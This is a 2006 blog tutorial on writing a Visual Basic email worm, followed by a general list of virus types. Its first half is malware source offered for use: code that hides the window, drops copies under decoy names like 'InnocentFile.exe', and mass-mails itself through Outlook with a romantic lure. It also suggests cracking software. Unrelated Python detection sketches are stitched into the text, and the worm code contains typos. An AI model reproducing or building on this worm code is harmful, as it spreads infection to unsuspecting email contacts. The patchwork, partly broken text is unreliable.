Writing a Worm Tool!
9 October 2006

Writing a worm tool :)

A worm is a simple and easy program that can spread by itself to other machines. What is the difference between a
worm and a virus? A virus is a program that can infect documents but must be sent by a person to be able to
spread. A worm can spread itself by email, and it can spread itself at any time. A worm can be made in any
programming language available. Some of the programming languages I would prefer for making a worm are:

-Visual Basic
-C++
-Delphi
-Javascript
-Visual Basic Scripting

These languages can all be used to make worms. Easier languages like Batch can also be used to make worms.
The worm has one main goal, and that goal is to spread to another machine. Some of the many ways of spreading
include:

-Email
-Injection
-Infection of files
-File Sharing
-Exploits such as the Dcom Exploit W32.Blaster Used
-Messenger Exploits


These can all be used to spread a file to another machine. I usually use the Email, Binary Injection and File Sharing
methods to spread my worm. I am going to show you how to make a worm in Visual Basic. Visual Basic is easy to
learn and is a beginner language. What is nice about Visual Basic is that once you have mastered it you are ready to
move up to a higher language such as C++. Visual Basic and Delphi are the same except for one major difference:
Visual Basic requires the runtime files to run, while Delphi doesn't. If your worm is in Visual Basic, you can download
and crack programs such as www.Thinstall.com or www.Winzip.com and have your worm drop the runtime files.

Now the first thing we are going to do is show you what the worm we are going to create will perform. The
worm we are going to create is w32.N00bie. This worm is not very powerful but is good for the beginner. To be able
to create this worm you will need Microsoft Visual Basic. Visual Basic is a RPD or Rapid Application Builder. We
will now begin to make our first program in Visual Basic. Open up Visual Basic and select a Standard .exe program.
Now Visual Basic will load a window that is titled "Form1". This is the main form for Visual Basic. This is your
worm. Double-click on the window labeled "Form1" and you will see the text below:

Private formsub_load()


End Sub

You will be coding between this text. (Image One shows an example of where you will be coding.)



The 1st thing you will do is hide your worm. A worm must have stealth in order to be considered a "Real" Worm.
One way you can hide any Window in Visual Basic is the below code

Form1.Visible = False

The above code will make Form1 invisible. Or you could do this:

Me.hide

So, Now let's add Me.Hide into our code. So, the code in Visual Basic should now look like the below.

Private Sub form_Load()
Me.Hide
End Sub

So far the only thing your worm will do is hide itself from the user. So now let's make the worm's heart. I said
above that a worm must do SOME of the following things:

-Email
-Injection
-Infection of files
-File Sharing
-Exploits such as the Dcom Exploit W32.Blaster Used
-Messenger Exploits

In this worm we are going to do emailing and file sharing, and we will also do some DDoS attacks and more with the
worm on a certain date. So the first thing we want our worm to do is copy itself somewhere on the machine. Why, you
may ask? This is a good question. The reason is, let's say that the worm is launched from the email attachment
but somehow it is deleted when the user restarts. Well, with a copy of the worm on the machine there is always a
good chance that the worm will be activated again. So let's have the worm copy itself a few times on the system.
This is the code to copy itself to other places on the machine. When I say copy itself, I mean making an
exact copy of itself in another location with a different name. So we are going to make this sample worm copy
itself to the C:\ drive using the following file names:

C:\Worm1.exe
C:\InnocentFile.exe
C:\Me.exe
C:\OpenMe!.exe

So, in Visual Basic, in order to have it copy itself with those file names to the C:\ drive we would have to enter the
following code. If you study the code you will understand what it means. I have explained the code a little better
below.

Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"

Now what does this code mean piece by piece? I will explain it as best I can below:

Filecopy - This means copy a file.

App.Path + - This Means it will copy the Applications Path

"\" - This is hard to explain. You know how when you are typing a location like C:\ and you see the \? Well in this
code with out the "\" it would look like this C: Windows Desktop Worme.exe So we have to add this in "\" to get it
to look like C:\Windows\Desktop\Worme.exe

App.EXEname + - This means that it's going to make a copy of the Applications Original .Exe Name

.exe - File extension

Then, after the location of the file has been selected, you need to tell Visual Basic where to copy the worm to. So,
you see the last part of this code (the part in bold):

Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"

This is where we will specify where we want a copy of the worm to be copied to. So If you changed the last part of
the code to C:\Windows\Openme!.exe it would make a copy of the worm to C:\Windows\Openme!.exe

Now, I hope I haven't confused you a lot. If I have, I am sorry! Lol. Anyway, your Visual Basic code should now
look like this:

Private Form Sub_Load()
Me.hide
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"
End Sub

So now you have your worm doing the following actions:

Hiding itself from the user (stealthing itself)
Copying an exact copy of itself to C:\Worm1.Exe, C:\Innocentfile.exe, C:\Me.exe, C:\Openme.exe
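
Seen from the defender's side, the self-copy step above leaves a recognisable trace: several executables with unrelated names but byte-identical content in one directory. The following Python sketch is an added example, not code from the original post; the function names, the extension list and the throwaway sample files are constructed for illustration.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

# Extensions Windows will execute directly; an assumption chosen for this example.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif"}


def sha256_of(path, chunk_size=65536):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_cloned_executables(directory, min_copies=2):
    """Map SHA-256 -> sorted file names for executables whose content
    appears under at least min_copies different names in directory."""
    names_by_hash = defaultdict(list)
    for entry in os.scandir(directory):
        if not entry.is_file(follow_symlinks=False):
            continue
        extension = os.path.splitext(entry.name)[1].lower()
        if extension in EXECUTABLE_EXTENSIONS:
            names_by_hash[sha256_of(entry.path)].append(entry.name)
    return {digest: sorted(names)
            for digest, names in names_by_hash.items()
            if len(names) >= min_copies}


def run_constructed_sample():
    """Build a throwaway directory and return the flagged name groups."""
    clone_bytes = b"constructed placeholder content, not a real program"
    sample_files = {
        # The four drop names listed in the post, all with identical bytes.
        "Worm1.exe": clone_bytes,
        "InnocentFile.exe": clone_bytes,
        "Me.exe": clone_bytes,
        "OpenMe!.exe": clone_bytes,
        # Controls: a different executable, and the same bytes in a non-executable.
        "setup.exe": b"constructed unrelated installer bytes",
        "notes.txt": clone_bytes,
    }
    with tempfile.TemporaryDirectory() as root:
        for name, content in sample_files.items():
            with open(os.path.join(root, name), "wb") as handle:
                handle.write(content)
        return sorted(find_cloned_executables(root).values())


if __name__ == "__main__":
    for group in run_constructed_sample():
        print("identical content under different names:", ", ".join(group))
```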

Now, let's make your worm spread. The easiest way for a worm to spread is via email. Email is the #1
spreading method of an Internet worm. So now let's add the email code into this program.

(Note: For the email code to work you will need to add a Windows Scripting Control into your program. If you don't,
then your worm will not perform the email task. You add a WSC the same way you add a Winsock Control.)

Now Add this Visual Basic Scripting code into your program's code:

Set so = CreateObject(fso)
Set ol = CreateObject("Outlook.Application")
Set out = Wscript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X)
Mail.Subject = "Fwd:None"
Mail.Body = "Do you want to suprise your wife or husband? Do you want to do something Romantic for them?
Wanna find out how to get lucky Sydney has made this Awesome Document Attached. It tells men everything a
Lady wants! And Ladies you can add stuff onto it before forwarding it to all your freinds!"
Mail.Attachments.Add = "C:\Worm1.exe"
Mail.Send
Next
ol.Quit

Now your worm emails itself. I want to let you know that when you compile the Visual Basic code, this VBS
code may give you an error. If it does, delete any code that gives you the error. It's usually the first line, Set
So=CreateObject(fso); if this occurs, just delete it and then try recompiling. It should work. If it doesn't,
troubleshoot and you will manage to fix the problem! Anyway, your Visual Basic code should now look like this:


Private Form Sub_Load()
Me.hide
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"
Set so = CreateObject(fso)
Set ol = CreateObject("Outlook.Application")
Set out = Wscript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X)
Mail.Subject = "Fwd:None"
Mail.Body = "Do you want to suprise your wife or husband? Do you want to do something Romantic for them?
Wanna find out how to get lucky Sydney has made this Awesome Document Attached. It tells men everything a
Lady wants! And Ladies you can add stuff onto it before forwarding it to all your freinds!"
Mail.Attachments.Add = "C:\Worm1.exe"
Mail.Send
Next
ol.Quit
End Sub

Now you have a worm! How is this a worm? A worm is a file that can email itself and infect other computers without
a person having to email the file; the worm will do it by itself.
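
The mailing loop above sends one message per address-book entry, each with the same subject and the same attachment, which a mail gateway sees as a burst from one sender. The following detection sketch is an added example, not part of the original post; the CSV log layout, field names, thresholds and all log lines are constructed assumptions.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical gateway log layout, one row per delivered message.
FIELDS = ["timestamp", "sender", "recipient", "subject",
          "attachment", "attachment_digest"]
RISKY_EXTENSIONS = {"exe", "scr", "pif", "com", "vbs"}

# Constructed log lines with placeholder digests.
SAMPLE_LOG = """\
2006-10-09T20:30:01,alice@example.test,u1@example.test,Fwd:None,Worm1.exe,digest-a
2006-10-09T20:30:02,alice@example.test,u2@example.test,Fwd:None,Worm1.exe,digest-a
2006-10-09T20:30:03,alice@example.test,u3@example.test,Fwd:None,Worm1.exe,digest-a
2006-10-09T20:30:04,alice@example.test,u4@example.test,Fwd:None,Worm1.exe,digest-a
2006-10-09T20:30:05,alice@example.test,u5@example.test,Fwd:None,Worm1.exe,digest-a
2006-10-09T20:30:06,alice@example.test,u6@example.test,Fwd:None,Worm1.exe,digest-a
2006-10-09T20:31:00,carol@example.test,u1@example.test,Minutes,minutes.pdf,digest-b
2006-10-09T09:00:00,dave@example.test,u1@example.test,Build,tool.exe,digest-c
2006-10-09T15:00:00,dave@example.test,u2@example.test,Build,tool.exe,digest-c
"""


def detect_mass_mailing(log_text, window=timedelta(seconds=60), min_recipients=5):
    """Alert when one sender delivers the same executable attachment to
    min_recipients or more distinct recipients inside a sliding time window."""
    events = defaultdict(list)
    for row in csv.DictReader(io.StringIO(log_text), fieldnames=FIELDS):
        name = row["attachment"]
        extension = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if extension not in RISKY_EXTENSIONS:
            continue
        when = datetime.fromisoformat(row["timestamp"])
        events[(row["sender"], row["attachment_digest"])].append((when, row["recipient"]))

    alerts = []
    for (sender, digest), items in events.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            # Shrink the window from the left until it spans at most `window`.
            while items[end][0] - items[start][0] > window:
                start += 1
            recipients = {recipient for _, recipient in items[start:end + 1]}
            if len(recipients) >= min_recipients:
                alerts.append({"sender": sender, "attachment_digest": digest,
                               "recipients": len(recipients),
                               "window_start": items[start][0].isoformat()})
                break  # one alert per sender/attachment pair is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_mass_mailing(SAMPLE_LOG):
        print(alert)
```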


TYPES OF WORMS

Overwrite Method - This is the quickest method for making a worm infect documents on the machine. It will overwrite them. It works like this: each Windows computer has a C:\Windows\Defrag.exe, so your worm will copy itself as c:\windows\defrag.exe.

Binary Infection - This method is not easy! Binary is hard for newbies. Binary infection is where a worm made in any language (YES, IT IS POSSIBLE IN BATCH) infects a document's binary. Let's use disk defragger again. We know all Windows computers have c:\windows\defrag.exe, so our worm will open up the binary (the binary is like the DNA of a file; it controls the body, like its genetic code) and it will copy the worm's binary to the end or beginning of c:\windows\defrag.exe's binary. This means that each time disk defragger is run, the worm is running with it inside of defrag.exe! This is a hard process to configure.

Injection into a Process - Injection is like this. You know how you go to the doctor's office and you get a shot? Well, let's say you went in for a TD (Tetanus-Diphtheria) shot. This shot will actually inject "dead" bacteria of the disease into your body so that the immune system can look at it and make an antidote. Well, injection does the same thing. It shoots the virus into a running process or into a file. It's rather hard to explain. This is another way a worm can spread.

Resident Viruses

This type of virus hides permanently in the RAM memory. From here it can control and intercept all of the operations carried out by the system: corrupting files and programs that are opened, closed, copied, renamed etc.

Resident viruses can be treated as file infector viruses. When a virus goes memory resident, it will remain there until the computer is switched off or restarted (waiting for certain triggers to activate it, such as a specific date and time). In the meantime it sits and waits in hiding, unless of course an antivirus can locate and eliminate it.

Examples include: Randex, CMJ, Meve, MrKlunky.



Direct Action Viruses

The principal aim of these viruses is to replicate and take action when they are executed. When a specific condition is met, the virus will go into action and infect files in the directory or folder that it is in and in directories that are specified in the AUTOEXEC.BAT file PATH. This batch file is always located in the root directory of the hard disk and carries out certain operations when the computer is booted.

Files infected with this type of virus can be disinfected, and completely restored to their original condition.



Overwrite Viruses

This type of virus is characterized by the fact that it deletes the information contained in the files that it infects, rendering them partially or totally useless once they have been infected.

Infected files do not change size, unless the virus occupies more space than the original file, because instead of hiding within a file, the virus replaces the file's content.

The only way to clean a file infected by an overwrite virus is to delete the file completely, thus losing the original content.

Examples of this virus include: Way, Trj.Reboot, Trivial.88.D.
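
Because an overwritten file can keep its original size, as noted above, integrity monitoring has to compare content digests rather than sizes. The following Python sketch is an added example, not from the original page; the function names, file names and file contents are constructed for illustration.

```python
import hashlib
import os
import tempfile


def snapshot(directory):
    """Record (size, SHA-256) for every regular file in directory."""
    state = {}
    for entry in os.scandir(directory):
        if entry.is_file(follow_symlinks=False):
            with open(entry.path, "rb") as handle:
                data = handle.read()
            state[entry.name] = (len(data), hashlib.sha256(data).hexdigest())
    return state


def compare(baseline, current):
    """Classify every file seen in either snapshot."""
    findings = {}
    for name, (size, digest) in baseline.items():
        if name not in current:
            findings[name] = "missing"
            continue
        current_size, current_digest = current[name]
        if current_digest == digest:
            findings[name] = "unchanged"
        elif current_size == size:
            # The case a size-only check would miss entirely.
            findings[name] = "same_size_modified"
        else:
            findings[name] = "size_changed"
    for name in current.keys() - baseline.keys():
        findings[name] = "new"
    return findings


def _write(root, name, data):
    with open(os.path.join(root, name), "wb") as handle:
        handle.write(data)


def run_constructed_tamper_test():
    """Baseline a throwaway directory, simulate tampering, return findings."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "report.doc", b"A" * 512)
        _write(root, "tool.exe", b"B" * 2048)
        _write(root, "notes.txt", b"C" * 100)
        _write(root, "readme.txt", b"D" * 64)
        baseline = snapshot(root)

        _write(root, "report.doc", b"X" * 512)    # content replaced, size kept
        _write(root, "tool.exe", b"Y" * 4096)     # content replaced, size grew
        os.remove(os.path.join(root, "notes.txt"))
        _write(root, "extra.exe", b"Z" * 10)      # file absent from baseline
        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for name, verdict in sorted(run_constructed_tamper_test().items()):
        print(f"{name}: {verdict}")
```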



Boot Virus

This type of virus affects the boot sector of a floppy or hard disk. This is a crucial part of a disk, in which information on the disk itself is stored together with a program that makes it possible to boot (start) the computer from the disk.

This kind of virus does not affect files, but rather the disks that contain them. First they attack the boot sector of the disk then, once you start your computer, the boot virus will infect the hard drive of your computer.

The best way of avoiding boot viruses is to ensure that floppy disks are write-protected and never start your computer with an unknown floppy disk in the disk drive.

Some examples of boot viruses include: Polyboot.B, AntiEXE.



Macro Virus

Macro viruses infect files that are created using certain applications or programs that contain macros. These include Word documents (DOC extensions), Excel spreadsheets (XLS extensions), PowerPoint presentations (PPS extensions), Access databases (MDB extensions), Corel Draw etc.

A macro is a small program that a user can associate to a file created using certain applications. These mini-programs make it possible to automate series of operations so that they are performed as a single action, thereby saving the user from having to carry them out one by one.

When a document containing macros is opened, they will automatically be loaded and may be executed immediately or when the user decides to do so. The virus will then take effect by carrying out the actions it has been programmed to do, often regardless of the program's built-in macro virus protection.

There is not just one type of macro virus, but one for each tool: Microsoft Word, Microsoft Excel, Microsoft PowerPoint, Microsoft Access, Corel Draw, Lotus Ami Pro, etc.

Some examples of macro viruses: Relax, Melissa.A, Bablas, O97M/Y2K.



Directory Virus

An operating system finds files by looking up the path (composed of the disk drive and directory) in which each file is stored.

Directory viruses change the paths that indicate the location of a file. By executing a program (file with the extension .EXE or .COM) which has been infected by a virus, you are unknowingly running the virus program, while the original file and program have been previously moved by the virus.

Once infected it becomes impossible to locate the original files.



Encrypted

Encryption is a technique used by viruses so that they cannot be detected by antivirus programs.

The virus encodes or encrypts itself so as to be hidden from scans; before performing its task it will decrypt itself. Once it has unleashed its payload the virus will then go back into hiding.

Examples of encrypted viruses include: Elvira, Trile.



Polymorphic Virus

Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) every time they infect a system.

This makes it impossible for antiviruses to find them using string or signature searches (because they are different in each encryption) and also enables them to create a large number of copies of themselves.

Some examples include: Elkern, Marburg, Satan Bug, Tuareg.



Multipartite Virus

These advanced viruses can create multiple infections using several techniques. Their objective is to attack any elements that can be infected: files, programs, macros, disks, etc.

They are considered fairly dangerous due to their capacity to combine different infection techniques.

Some examples include: Ywinz.




File Infectors

This type of virus infects programs or executable files (files with an .EXE or .COM extension). When one of these programs is run, directly or indirectly, the virus is activated, producing the damaging effects it is programmed to carry out. The majority of existing viruses belong to this category, and can be classified depending on the actions that they carry out.



Companion Viruses

Companion viruses can be considered file infector viruses like resident or direct action types. They are known as companion viruses because once they get into the system they "accompany" the other files that already exist. In other words, in order to carry out their infection routines, companion viruses can wait in memory until a program is run (resident viruses) or act immediately by making copies of themselves (direct action viruses).

Some examples include: Stator, Asimov.1539, Terrax.1069



FAT Virus

The file allocation table or FAT is the part of a disk used to connect information and is a vital part of the normal functioning of the computer.

This type of virus attack can be especially dangerous, by preventing access to certain sections of the disk where important files are stored. Damage caused can result in information losses from individual files or even entire directories.



Worms

A worm is a program very similar to a virus; it has the ability to self-replicate, and can lead to negative effects on your system and most importantly they are detected and eliminated by antiviruses. However, worms are not strictly viruses, as they do not need to infect other files in order to reproduce.

Worms can exist without damaging files, and can reproduce at rapid speeds, saturating networks and causing them to collapse.

Worms almost always spread through e-mail, networks and chat (such as IRC or ICQ). They can also spread within the memory of a computer.

Some examples of worms include: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, Mapson.



Trojans or Trojan Horses

Another unsavory breed of malicious code are Trojans or Trojan horses, which unlike viruses do not reproduce by infecting other files, nor do they self-replicate like worms.

Trojans work in a similar way to their mythological namesake, the famous wooden horse that hid Greek soldiers so that they could enter the city of Troy undetected.

They appear to be harmless programs that enter a computer through any channel. When that program is executed (they have names or characteristics which trick the user into doing so), they install other programs on the computer that can be harmful.

A Trojan may not activate its effects at first, but when they do, they can wreak havoc on your system. They have the capacity to delete files, destroy information on your hard drive and open up a backdoor to your system. This gives them complete access to your system allowing an outside user to copy and resend confidential information.

Some examples of Trojans are: IRC.Sx2, Trifor.




Logic Bombs

They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs.

Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive.



False Viruses

These messages are often confused for viruses but are something else entirely. It is important to know the difference between a real virus threat and a false virus.

Hoaxes are not viruses, they are false messages sent by e-mail, warning users of a non-existent virus. The intention is to spread rumors causing panic and alarm among users who receive this kind of information.

Occasionally, hoax warnings include technical terms to mislead users. On some other occasions, the names of some press agencies are mentioned in the heading of the warnings. In this way, the hoax author attempts to trick users into believing that they have received a warning about a real virus. Hoaxes try to fool the user into performing a series of actions to protect themselves from the virus, sometimes leading to negative results.

Users are advised not to pay attention to these misleading warnings and delete these messages once received without sending them to others.

posted by VaTsAl at 8:28 pm | Permalink

